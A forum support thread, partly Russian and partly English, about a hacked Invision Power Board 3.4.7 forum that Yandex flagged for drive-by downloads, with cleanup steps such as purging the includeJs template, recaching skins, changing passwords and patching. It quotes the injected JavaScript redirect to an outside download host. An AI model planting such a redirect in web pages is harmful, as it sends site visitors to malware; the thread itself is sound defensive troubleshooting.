Перейти к содержимому
Русский язык для Invision Community 5

Яндекс обнаружил вредоносный код на форуме

Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

Рекомендованные сообщения

  • Автор

Проверка была до того как я сделал то, что вы сказали.

Я запросил перепроверку еще 2-го числа, ответа пока нету - сижу жду.

Очень надеюсь, что ваши рекомендации возымели действие.

Админ отписался, что пытались авторизироватся в АЦ с двумя админских аккаунтов (из трех). Пытались один раз для каждого аккаунта. Пароли использовали конкретные, не случайные, что подтверждает предположение взлома через инъекцию и утечку паролей администраторов.

Метка зараженного сайта с него уже сняли после перепроверке в яндекс вебмастере (примерно за три - четыре дня).

  • Автор

Наконец-то прошла перепроверка и радость:

 

Последняя проверка сайта 9 Февраля 2015 не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.

 

Огромное спасибо всем и особенно siv1987!!!

 

Сделал для себя вывод, что медлить с установкой патчей никогда не стоит.

Guys i have identical problem but i cant find solution.

Can i write here in english language?

The solution for this problem is on the first page of the second message. Use google translate.

 

Основная суть лечения заключается в:

You have a virus. Can check this at url myforum.pl/index.php?ipbv=hash&g=js White page means that the forum is infected. You need:

- delete virus from template includeJs, group Globals in admincenter (from all skins). Sometimes the virus is left only in the cache, so proceed to the next step.

- rebuild skins cache

- change passwords all users who have access in admincenter! It is very important.

- change password from database

- change password form ftp

- install the all latest security patches or upgrade to latest version

- additionally find shells on ftp

Yea i saw that. But i hawe question. On my comunity i have 2 skins. And i dont really know is my includeJS is clean from suspicius code. Below i paste two of my files. Please check it for aditional suspicius code:

 

http://wklej.org/id/1637307/
http://wklej.org/id/1637306/

 

Thx a lot

Sometimes the virus is in only the cache. Then you need to rebuild caches skins to remove malware from cache - Template Tools -> Recache Skin Sets

Sometimes the virus is in only the cache. Then you need to rebuild caches skins to remove malware from cache - Template Tools -> Recache Skin Sets

 

After this issue is gone, but it back after couple days. But i saw sometching strange. its back always in monday. I was check in ACP and only one cron job runs every monday:

 

http://prntscr.com/65vsnt

 

is this posible the problem is something there ?

After this issue is gone, but it back after couple days.

You change the password of all administrators? Change password from db? It is important, because allegedly hacking occurs through leakage of passwords. Also, be sure to install the all latest security patches.

 

is this posible the problem is something there ?

Maybe. But this is a standard task, need to watch the code from this task. Attach the file /admin/applications/core/tasks/minifycleanup.php

For now i do

- rebuild skins cache

- change passwords all users who have access in admincenter! It is very important.

- change password from database

- change password form ftp

- additionally find shells on ftp <-----------------dont find any strange files

 

 

minifycleanup.php but its after recache

 

http://wklej.org/id/1637342/

minifycleanup.php but its after recache

Minify is clean.

 

For now i do

Ok. Now wait and watch the forum. Pay attention the unsuccessful attempts to log in the admincenter. More code should not appear. If appears again, need a more comprehensive approach to the problem. Most likely somewhere there is a backdoor that want to find.

Ok... for now i send to you BIG THANKS

You are install the latest security patches from the november 2014? Version 3.4.7 installed before this date is vulnerable. Make sure that your distribution is fresh.

I do fresh install of ipb 3.4.7 in january

Создайте аккаунт или войдите в него для комментирования

Важная информация

При использовании данного сайта, вы согласаетесь с Условия использования и Чтобы сделать этот веб-сайт лучше, мы разместили cookies на вашем устройстве. Вы можете изменить свои настройки cookies, в противном случае мы будем считать, что вы согласны с этим..

Аккаунт

Навигация

Поиск

Поиск

Настроить push-уведомления браузера

Chrome (Android)
  1. Нажмите на иконку замка рядом с адресной строкой.
  2. Нажмите Права доступа -> Уведомления.
  3. Измените свои настройки.
Chrome (компьютер)
  1. Нажмите на иконку замка в адресной строке.
  2. Выберите Настройки сайта.
  3. Найдите Уведомления и измените свои настройки.